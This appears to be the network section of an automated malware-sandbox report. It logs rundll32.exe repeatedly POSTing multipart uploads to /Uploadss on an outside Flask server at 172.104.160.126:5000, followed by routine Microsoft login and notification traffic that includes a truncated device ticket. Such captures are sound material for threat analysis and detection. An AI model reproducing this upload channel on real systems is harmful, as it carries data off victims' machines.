                              Jul 22, 2024 16:00:57.639928102 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------218f885d1d1b01f5
                              Jul 22, 2024 16:00:58.592658043 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:58 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              120192.168.2.649308172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:58.618525982 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------21ef4c783e5ef6a8
                              Jul 22, 2024 16:00:59.604679108 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:59 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              121192.168.2.649309172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:59.630758047 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------8d935b7ab73db626
                              Jul 22, 2024 16:01:00.559245110 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:00 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              122192.168.2.649310172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:00.582381010 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------3e1bcbfd1ac49b71
                              Jul 22, 2024 16:01:02.057221889 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:01 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}
                              Jul 22, 2024 16:01:02.059281111 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:01 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              123192.168.2.649311172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:02.463252068 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------453e0988638a690b
                              Jul 22, 2024 16:01:03.456154108 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:03 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              124192.168.2.649312172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:03.470257044 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------936caa563e76ca26
                              Jul 22, 2024 16:01:04.427050114 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:04 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              125192.168.2.649313172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:04.450942039 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------96aa930188ad95d0
                              Jul 22, 2024 16:01:05.689122915 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:05 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              126192.168.2.649314172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:05.714416027 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------1c10b124588ac309
                              Jul 22, 2024 16:01:06.660924911 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:06 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              127192.168.2.649315172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:06.704602957 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------7cef968b537d35d7
                              Jul 22, 2024 16:01:07.703936100 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:07 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              128192.168.2.649316172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:07.724663019 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------cd9315d0f70306a2
                              Jul 22, 2024 16:01:08.669856071 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:08 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              129192.168.2.649317172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:08.704874992 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------1e25afe42fd86294
                              Jul 22, 2024 16:01:09.676007032 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:09 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              130192.168.2.649318172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:09.702301979 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------01894383c334ebcc
                              Jul 22, 2024 16:01:10.699625969 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:10 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              131192.168.2.649319172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:10.717380047 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------2c7fc54d6c7c04d4
                              Jul 22, 2024 16:01:11.710686922 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:11 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              132192.168.2.649320172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:11.769510984 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------bb4d8fe5f94a83f5
                              Jul 22, 2024 16:01:12.789072037 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:12 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              133192.168.2.649321172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:12.819550037 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a9d83593ce6d0496
                              Jul 22, 2024 16:01:14.040612936 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:13 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              134192.168.2.649322172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:14.065063953 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------d2c48da37d466a87
                              Jul 22, 2024 16:01:15.043804884 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:14 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              135192.168.2.649323172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:15.075386047 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------450e1ee269f45e90
                              Jul 22, 2024 16:01:16.017290115 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:15 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              136192.168.2.649324172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:01:16.039887905 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------0089c8439ef77124
                              Jul 22, 2024 16:01:17.004576921 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:01:16 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              137192.168.2.649327172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:16.191401958 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------6e3e4c3b05a79857
                              Jul 22, 2024 16:03:17.202486038 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:16 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              138192.168.2.649328172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:17.225318909 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------521206e0c9b94cee
                              Jul 22, 2024 16:03:18.188991070 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:17 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              139192.168.2.649329172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:18.221664906 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------3e6e6e56ae2cb74d
                              Jul 22, 2024 16:03:19.182420969 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:18 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              140192.168.2.649330172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:19.205502987 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------03a4310a76240f87
                              Jul 22, 2024 16:03:20.408421040 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:20 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              141192.168.2.649331172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:20.436728954 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------0eac6bd829619dc3
                              Jul 22, 2024 16:03:21.368740082 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:21 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              142192.168.2.649332172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:21.395981073 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------7554e3942a8f0809
                              Jul 22, 2024 16:03:22.644881010 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:22 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              143192.168.2.649333172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:22.697532892 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------f183d5370c54fe4b
                              Jul 22, 2024 16:03:23.685143948 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:23 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              144192.168.2.649334172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:23.985636950 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------ca18e54d06119b02
                              Jul 22, 2024 16:03:24.911393881 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:24 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              145192.168.2.649335172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:24.942766905 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------998ba500316220a8
                              Jul 22, 2024 16:03:25.909090996 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:25 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              146192.168.2.649336172.104.160.12650003992C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:25.931350946 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------2680bd2607a01273
                              Jul 22, 2024 16:03:27.155927896 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:26 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              147192.168.2.649337172.104.160.1265000
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:27.179018021 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------03efbda4d78b7cdf
                              Jul 22, 2024 16:03:28.389327049 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:27 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              148192.168.2.649338172.104.160.1265000
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:03:28.401137114 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a35d77128ae5cf6a
                              Jul 22, 2024 16:03:29.383732080 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:03:29 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              0192.168.2.64971540.113.103.199443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:57:48 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 32 7a 44 46 48 39 69 70 67 30 6d 49 77 78 49 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 62 65 39 62 61 65 37 38 37 37 38 37 66 64 66 0d 0a 0d 0a
                              Data Ascii: CNT 1 CON 305MS-CV: 2zDFH9ipg0mIwxIz.1Context: ebe9bae787787fdf
                              2024-07-22 13:57:48 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                              2024-07-22 13:57:48 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 32 7a 44 46 48 39 69 70 67 30 6d 49 77 78 49 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 62 65 39 62 61 65 37 38 37 37 38 37 66 64 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 30 75 39 54 68 4d 51 6f 61 5a 51 66 54 44 49 6a 46 53 7a 42 48 7a 6d 37 76 47 6a 6f 6c 74 52 4c 37 65 75 57 38 58 42 51 4c 37 78 65 79 30 75 73 73 76 42 4f 34 53 37 4f 55 67 4d 37 68 58 57 4d 4e 44 79 4a 4d 59 6e 4e 37 66 71 46 62 30 49 7a 6c 57 68 46 4f 44 33 48 4f 2f 57 4a 4c 38 72 47 5a 35 31 2f 79 6d 34 55 7a 77 6c 4f
                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 2zDFH9ipg0mIwxIz.2Context: ebe9bae787787fdf<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY0u9ThMQoaZQfTDIjFSzBHzm7vGjoltRL7euW8XBQL7xey0ussvBO4S7OUgM7hXWMNDyJMYnN7fqFb0IzlWhFOD3HO/WJL8rGZ51/ym4UzwlO
                              2024-07-22 13:57:48 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 32 7a 44 46 48 39 69 70 67 30 6d 49 77 78 49 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 62 65 39 62 61 65 37 38 37 37 38 37 66 64 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 2zDFH9ipg0mIwxIz.3Context: ebe9bae787787fdf<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                              2024-07-22 13:57:48 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                              Data Ascii: 202 1 CON 58
                              2024-07-22 13:57:48 UTC58INData Raw: 4d 53 2d 43 56 3a 20 79 47 77 79 58 71 51 4c 41 45 53 68 4c 47 36 41 64 31 56 56 36 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                              Data Ascii: MS-CV: yGwyXqQLAEShLG6Ad1VV6w.0Payload parsing failed.


                              Session IDSource IPSource PortDestination IPDestination Port
                              1192.168.2.64971440.126.31.69443
                              TimestampBytes transferredDirectionData
                              2024-07-22 13:57:48 UTC422OUTPOST /RST2.srf HTTP/1.0
                              Connection: Keep-Alive
                              Content-Type: application/soap+xml
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                              Content-Length: 4722
                              Host: login.live.com
                              2024-07-22 13:57:48 UTC4722OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                              2024-07-22 13:57:48 UTC569INHTTP/1.1 200 OK
                              Cache-Control: no-store, no-cache
                              Pragma: no-cache
                              Content-Type: application/soap+xml; charset=utf-8
                              Expires: Mon, 22 Jul 2024 13:56:48 GMT
                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                              Referrer-Policy: strict-origin-when-cross-origin
                              x-ms-route-info: C558_BAY
                              x-ms-request-id: 5be45668-92d4-465e-9dae-26a785cf8a00
                              PPServer: PPV: 30 H: PH1PEPF00012005 V: 0
                              X-Content-Type-Options: nosniff
                              Strict-Transport-Security: max-age=31536000
                              X-XSS-Protection: 1; mode=block
                              Date: Mon, 22 Jul 2024 13:57:48 GMT
                              Connection: close
                              Content-Length: 10197
